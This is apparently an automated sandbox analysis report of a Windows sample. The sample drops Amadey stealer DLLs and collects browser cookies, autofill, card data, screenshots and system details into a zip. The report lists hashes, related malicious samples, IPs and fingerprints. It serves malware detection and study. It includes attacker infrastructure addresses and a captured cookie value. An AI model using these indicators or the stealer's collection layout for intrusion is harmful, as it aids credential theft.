                                                          Show All
                                                          • Excluded IPs from analysis (whitelisted): 20.82.209.183, 52.113.196.254, 93.184.220.29, 13.107.3.254, 13.107.246.254, 104.42.151.234, 13.64.90.137, 92.122.145.220, 168.61.161.212, 104.43.139.144, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          22:59:09API Interceptor2610x Sleep call for process: blfte.exe modified
                                                          22:59:37API Interceptor20x Sleep call for process: rundll32.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          104.17.63.50Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                            EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                              c5d84b10_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                vOKzu00mm0.exeGet hashmaliciousBrowse
                                                                  AufXNtnyxx.exeGet hashmaliciousBrowse
                                                                    Hcq7GTXl1a.exeGet hashmaliciousBrowse
                                                                      27Mpw48Ugt.exeGet hashmaliciousBrowse
                                                                        JG4VV4c6kb.exeGet hashmaliciousBrowse
                                                                          iI2liFNAui.exeGet hashmaliciousBrowse
                                                                            41giyZ9TwJ.exeGet hashmaliciousBrowse
                                                                              DZ4xDpoGJ3.exeGet hashmaliciousBrowse
                                                                                wn1b07WNKv.exeGet hashmaliciousBrowse
                                                                                  cI20wYR2hG.exeGet hashmaliciousBrowse
                                                                                    d426d11zdf.exeGet hashmaliciousBrowse
                                                                                      ODHscWs591.exeGet hashmaliciousBrowse
                                                                                        9jn6moQ5Du.exeGet hashmaliciousBrowse
                                                                                          gKafRyd4nS.exeGet hashmaliciousBrowse
                                                                                            D0EzAlRr91.exeGet hashmaliciousBrowse
                                                                                              tnRELLiNW9.exeGet hashmaliciousBrowse
                                                                                                YypE29NBtp.exeGet hashmaliciousBrowse
                                                                                                  78.47.81.226Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  c5d84b10_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  vOKzu00mm0.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  AufXNtnyxx.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  Hcq7GTXl1a.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  27Mpw48Ugt.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  JG4VV4c6kb.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  iI2liFNAui.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/
                                                                                                  41giyZ9TwJ.exeGet hashmaliciousBrowse
                                                                                                  • 78.47.81.226/vcruntime140.dll

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  api.faceit.comMga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  c5d84b10_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  vOKzu00mm0.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  AufXNtnyxx.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  Hcq7GTXl1a.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  27Mpw48Ugt.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  JG4VV4c6kb.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  iI2liFNAui.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  41giyZ9TwJ.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  DZ4xDpoGJ3.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  wn1b07WNKv.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  lJvtP3Ytl7.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  3S8La8tVE4.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  5gqEecd9kP.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  IX5fpIEXJD.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  afDQft6no7.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  1QdgB9Fzkr.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  4dTnSl6Sep.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50

                                                                                                  ASN

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  CLOUDFLARENETUSmedline PO No. 9100002286.exeGet hashmaliciousBrowse
                                                                                                  • 104.21.19.200
                                                                                                  PaymentNotification.vbsGet hashmaliciousBrowse
                                                                                                  • 104.16.154.36
                                                                                                  Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  T4QllcPRsl.exeGet hashmaliciousBrowse
                                                                                                  • 104.21.6.252
                                                                                                  Telex_Copy.htmlGet hashmaliciousBrowse
                                                                                                  • 104.16.18.94
                                                                                                  b304a312_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                  • 104.26.12.31
                                                                                                  Ha11NppGrb.exeGet hashmaliciousBrowse
                                                                                                  • 104.21.85.176
                                                                                                  Wh00Ny9HXk.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.188.154
                                                                                                  ZRpmP5qEC1.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.188.154
                                                                                                  NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.62.50
                                                                                                  Setup.exeGet hashmaliciousBrowse
                                                                                                  • 104.23.98.190
                                                                                                  4G842SDA.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.188.154
                                                                                                  Bestellen.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.208.174
                                                                                                  PR#270473.exeGet hashmaliciousBrowse
                                                                                                  • 104.16.13.194
                                                                                                  VM_04_28_22.HTMGet hashmaliciousBrowse
                                                                                                  • 104.18.11.207
                                                                                                  SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                                                  • 162.159.130.233
                                                                                                  Halkbank_Ekstre_20210426_080203_744632.pdf.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.188.154
                                                                                                  Aeon Viet Nam Co.,Ltd.docGet hashmaliciousBrowse
                                                                                                  • 172.67.188.154
                                                                                                  shipment # 46-2021.jpg.exeGet hashmaliciousBrowse
                                                                                                  • 172.67.200.16
                                                                                                  MIROHOSTWebhostingdatacenteranddomainnamesregistratiz2xQEFs54b.exeGet hashmaliciousBrowse
                                                                                                  • 89.184.79.3
                                                                                                  https://mailinternetsub.com/ua.activelexb24/pub/mail/click.php?tag=sender.eyJSRUNJUElFTlRfSUQiOiIxNzcxMDIxIn0%3D&url=https%3A%2F%2Fstart.activelex.com%2F%3Fbx_sender_conversion_id%3D1771021%26utm_source%3Dnewsletter%26utm_medium%3Dmail%26utm_campaign%3Dvstygnit&sign=71edf9f0eba2e5293cc9be1db1a5515d039444194dbe19421aa2e9932d89a802Get hashmaliciousBrowse
                                                                                                  • 89.184.66.122
                                                                                                  990109.exeGet hashmaliciousBrowse
                                                                                                  • 89.184.79.3
                                                                                                  http://catalog.amsz.ua/1.phpGet hashmaliciousBrowse
                                                                                                  • 77.87.196.92
                                                                                                  http://catalog.amsz.ua/1.phpGet hashmaliciousBrowse
                                                                                                  • 77.87.196.92
                                                                                                  qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                  • 89.184.79.3
                                                                                                  kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                                  • 89.184.79.3
                                                                                                  3yhnaDfaxn.exeGet hashmaliciousBrowse
                                                                                                  • 89.184.79.3
                                                                                                  INV-20180718-985759 (1).docGet hashmaliciousBrowse
                                                                                                  • 89.184.73.254
                                                                                                  INV-20180718-985759 (1).docGet hashmaliciousBrowse
                                                                                                  • 89.184.73.254
                                                                                                  45CanadaPost.jsGet hashmaliciousBrowse
                                                                                                  • 89.184.68.185
                                                                                                  45CanadaPost.jsGet hashmaliciousBrowse
                                                                                                  • 89.184.68.185
                                                                                                  Emotet.docGet hashmaliciousBrowse
                                                                                                  • 89.184.64.110

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  37f463bf4616ecd445d4a1937da06e19mokster_encryptor.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-136896931.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-993959417.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  PaymentNotification.vbsGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-1145261761.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-397813623.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  Telex_Copy.htmlGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-1304161436.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-427473723.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  wendy.klawon@coldwellbanker.com.htmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  diagram-975956356.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  statistic-2115301159.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  statistic-2009856670.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  payload.exeGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  statistic-1693833818.xlsmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  .htmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50

                                                                                                  Dropped Files

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  C:\ProgramData\freebl3.dllIMG_8401_302_1076.docGet hashmaliciousBrowse
                                                                                                    Mga2NdfMyb.exeGet hashmaliciousBrowse
                                                                                                      EtnlEBRJwT.exeGet hashmaliciousBrowse
                                                                                                        SBYnyLbDrt.exeGet hashmaliciousBrowse
                                                                                                          NIxm9vbD6u.exeGet hashmaliciousBrowse
                                                                                                            SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                                                              HBS_5012306171.docGet hashmaliciousBrowse
                                                                                                                fdd6b649413776c157e7029b545d9e47a62b9decd6b2a.exeGet hashmaliciousBrowse
                                                                                                                  IMG650617250.xlsGet hashmaliciousBrowse
                                                                                                                    31768ba567580677ef466b1451e012d1fd35341ca7ec9.exeGet hashmaliciousBrowse
                                                                                                                      IMG60378611.docGet hashmaliciousBrowse
                                                                                                                        P20200107.DOCGet hashmaliciousBrowse
                                                                                                                          RFQ-NEW ORDER BERUIT 67271929.xlsxGet hashmaliciousBrowse
                                                                                                                            New order.docGet hashmaliciousBrowse
                                                                                                                              IMG850007630.exeGet hashmaliciousBrowse
                                                                                                                                c5d84b10_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                  vOKzu00mm0.exeGet hashmaliciousBrowse
                                                                                                                                    AufXNtnyxx.exeGet hashmaliciousBrowse
                                                                                                                                      Hcq7GTXl1a.exeGet hashmaliciousBrowse
                                                                                                                                        5ye5EA4o8s.exeGet hashmaliciousBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\1a9f26b569d5df\cred.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):127488
                                                                                                                                          Entropy (8bit):6.506297388263336
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:WeZmogDk+xTMLObNlEB+VSdQgXHOPz2XrLekm9:WeZkgOThNlIWzo
                                                                                                                                          MD5:985F9C4D8BF231CA08046BCD44D558EB
                                                                                                                                          SHA1:DE5711528D94DAB76186D9695CE19C3C6C26EEC9
                                                                                                                                          SHA-256:78322121578342E588375350F56EDB5E0A6D4B889C6425814590AFD1A967E650
                                                                                                                                          SHA-512:939DED352BF569DDC0EC01C642FB6DDB12D055B8A785FB717DAA63E9E3F141FF13A40291C18DF2D8EA28B2860F91067B9CFD1A740A587B7726D9CB293155E44F
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\ProgramData\1a9f26b569d5df\cred.dll, Author: Joe Security
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X....................@..........................@..........................................@.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..@...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                          C:\ProgramData\1a9f26b569d5df\scr.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):227328
                                                                                                                                          Entropy (8bit):6.551095959374544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:SJ+WK/pvT7arfwKFzDTsv5oaTh45CjBscX9TlHN:JJpb7Y7vf5i5X9TFN
                                                                                                                                          MD5:A48DC2DA2655FD049E37E36FCDA28FBA
                                                                                                                                          SHA1:96CE27AB5FEC62C6AC3ED96DD1BDC2DEFAD5499E
                                                                                                                                          SHA-256:76F6C712403A2F6213390AB2A72A82C98C9C48E1B1BDE182AA5932BD02A06D43
                                                                                                                                          SHA-512:37AD66440213CC29EC658158151366AFD077A2FF941323B4190279A4344F1B4C55109A5CF80B96ABD9BD4D07741A8CDAEC5D3651C53B0DD87F2E720C73264490
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................j......0........ ....@..................................................................p..?....P...................................&..................................................................................CODE....H........................... ..`DATA....`.... ......................@...BSS..........@......."...................idata.......P......."..............@....edata..?....p.......6..............@..P.reloc...&.......(...8..............@..P.rsrc................`..............@..P.....................x..............@..P................................................................................................................................................................................
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\d06ed635-68f6-4e9a-955c-4899f5f57b9a5987367876.zip
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):108133
                                                                                                                                          Entropy (8bit):7.991712087050555
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:3072:mdjR7WZEUCjtg7N/QX/sNiizLOR5gPseutNr:mdj8ZEUT7N/+6iizLKEstXr
                                                                                                                                          MD5:BE84BE8A21921CE7CF9FE786D2A04C51
                                                                                                                                          SHA1:84081C95ECA4D1F609B55D451198BE9E6898C503
                                                                                                                                          SHA-256:8817BDFA9296C561F232A8564F63B4451D6983BF72F641F3FB5D5A3F8B208EEA
                                                                                                                                          SHA-512:D0EE7F31187F1E779076A8EFE50B7B3DCCCC150C9B28E2502B6A74E48D6AF556E55E550217B0AB5ED1E388651300D16465079B30804D9A1D8849D70D6DA21702
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK........Z..R............#.../Autofill/Google Chrome_Default.txtUT.....`..`..`..PK........Z..R............#.../Autofill/Google Chrome_Default.txtUT.....`..`..`PK........X..R................/CC/Google Chrome_Default.txtUT.....`..`..`..PK........X..R................/CC/Google Chrome_Default.txtUT.....`..`..`PK........X..R................/Cookies/Edge_Cookies.txtUT.....`..`..`..PK........X..R................/Cookies/Edge_Cookies.txtUT.....`..`..`PK........X..R............".../Cookies/Google Chrome_Default.txtUT.....`..`..`-.Mo.0...3K.St..^8...p....4\..)_-......<k9Mr../.."..........;V...F..3.M...SIhU...8bVv-M......P...b....g9of[..1....1.....}.!=........._Q..`.2...Ks'....WO.G..I_1_E..E6.....@=..a~.....%x./.PK........X..R2C*.........".../Cookies/Google Chrome_Default.txtUT.....`..`..`PK........X..R................/Cookies/IE_Cookies.txtUT.....`..`..`..PK........X..R................/Cookies/IE_Cookies.txtUT.....`..`..`PK........\..R................/F
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Google Chrome_Default.txt
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):218
                                                                                                                                          Entropy (8bit):5.784604756829041
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:PkopYjdZWAUEbhTqKxUNHdHZ2HmwhZZZHwFnAVnn:copYxZdUwsb9HZ2pHRtn
                                                                                                                                          MD5:FC288C9A9642E747261A8AED0534BEA4
                                                                                                                                          SHA1:A8D655F06F5CFD9CAB34094EEB229071E536CC27
                                                                                                                                          SHA-256:9EF6B8DFE321BF6B0A505D91D48D2DD9BFC09B3BC1962CC62AA59C17718C166D
                                                                                                                                          SHA-512:A5CFC1508041932957E00049242A42C38F314EE713B1CEDF90FC5478DE8FEF059A81276AD6441B66534563B100F44CCE1EF025EB3BCA1CF76F6C660537F81060
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .google.com.FALSE./.FALSE.1617254995.NID.204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78..
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Files\Default.zip
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:Zip archive data (empty)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):22
                                                                                                                                          Entropy (8bit):1.0476747992754052
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:pjt/l:Nt
                                                                                                                                          MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                                                                          SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                                                                          SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                                                                          SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK....................
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\information.txt
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ISO-8859 text, with very long lines, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):12786
                                                                                                                                          Entropy (8bit):5.3328250306085785
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:vcOIO3eVarX2EpDjSCbpgBdQXRsg8nbNqqN:dxOVarX2E5SCbpgUX25boqN
                                                                                                                                          MD5:9A7FE4677895D1F90CC2B7385F2808EB
                                                                                                                                          SHA1:35C21EBD0350CD292549294BEE4E42BD63C40B83
                                                                                                                                          SHA-256:9C7D4B670A928F6F37BC305EDA930AEC0A22E1B16638B24B36EBD1190AFD9C98
                                                                                                                                          SHA-512:FCC21C6032159DF67037F8636E5516E7B3352274D50557BF45B84D76CAA36EB16E9EAE370268318DE80D6AA3BB5C8288363FE4FF69B1BF09F3DCC1168E580897
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Version: 38.6....Date: Wed Apr 28 22:58:45 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\Desktop\wKYTg7Gp6P.exe ..Work Dir: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ ....Windows: Windows 10 Pro [x64]..Computer Name: 019635..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 28/4/2021 22:58:45..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [300]..- csrss.exe [400]..- wininit.exe [476]..- csrss.exe [488]..- services.exe [568]..- winlogon.exe [576]..- lsass.exe [592]..- fontdrvhost.exe [692]..- svchost.exe [712]..- fontdrvhost.exe [724]..- svchost.exe [800]..- svchost.exe [84
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\screenshot.jpg
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):106376
                                                                                                                                          Entropy (8bit):7.930391321938815
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:/BanvT6q0Q30GHpQhuEqsIyEY8kmpxK1mc:/8vTEQE62hNZ8pOz
                                                                                                                                          MD5:55945602A41B65536293EF0BC653B3D0
                                                                                                                                          SHA1:5FF261CCC5C21A85E6312FBEE3D7742928D94FB0
                                                                                                                                          SHA-256:B4ECE390AE54D8A954BD9A7942BCEC505CEDDDFE7BB0FC9F277AE61AB58A0FF8
                                                                                                                                          SHA-512:EBA91D8948F3E93C15BE91C7D21DF6875DBC93FED5CB7F2665DA7C2899AA844F4EF34860FB6D95A499825F88F321461B92795BD976B676A58EB3A412A7E99BE4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z....>.....4+..b.Y&..F...)Pq.L....... .....H.#.|..).?.H.'.|....).?m.....h.t......|4.%...d....
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\temp
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):327680
                                                                                                                                          Entropy (8bit):0.8629517870531553
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:7HWU3iVy/BBE3uNBI0olG4oN03r9lgbFB/1Vum73r9lgbFB/1Vumq:6oiWBBjN20olG4oNQraFB/JraFB/Q
                                                                                                                                          MD5:449985B160AA92D02AAB2D8FE731B730
                                                                                                                                          SHA1:1892FE55BB7633EFA959DB3AFB97A54CC433C161
                                                                                                                                          SHA-256:EC26B9D21BF0D80653D3A8938F97B951198018771A8D656F7C29461E1A9ED0CA
                                                                                                                                          SHA-512:B3016A95AFCF699893BBECB28D272A6424B18416870CFE8BA93D1CD9D29C50513EA293F15B5423D6527820761D9D630D9104513D6D60BA76C7C504B6F1C2DA7C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):290304
                                                                                                                                          Entropy (8bit):6.9441301701352725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:QyRnLkiC4K+lDKzhQd22R+hb8L6COx6bHpk:7IiC4K6H0bK1oIHp
                                                                                                                                          MD5:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          SHA1:712FBB4DF005439B9810090FD3A2962848E252C4
                                                                                                                                          SHA-256:B5A399C0EA40983ABC68B828CCB14EFDE2DB90C047BBFBA9AE418317CE7F036D
                                                                                                                                          SHA-512:937BFD9845CC25A6739B8DF0CAC685C5499F4D55D5F70FFF5CE61A4569B7BE96D84E987E001B8E8109200C485F681BCC86911A29CC5E5E45B978DBACE7DA2CE3
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
